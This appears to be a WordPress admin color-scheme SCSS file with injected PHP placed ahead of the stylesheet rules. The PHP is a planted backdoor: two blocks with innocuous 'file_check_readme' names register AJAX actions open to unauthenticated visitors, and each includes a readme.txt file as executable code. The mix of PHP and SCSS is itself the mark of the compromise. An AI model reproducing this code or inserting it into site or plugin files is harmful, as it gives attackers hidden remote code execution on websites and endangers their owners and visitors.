if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
@use "sass:color"; $highlight-color: #3858e9; @use "../_admin.scss" with ( $scheme-name: "modern", $base-color: #1e1e1e, $highlight-color: #3858e9, $menu-submenu-focus-text: #7b90ff, $notification-color: $highlight-color, $link: $highlight-color, $link-focus: color.adjust($highlight-color, $lightness: -10%), $custom-welcome-panel: "false" );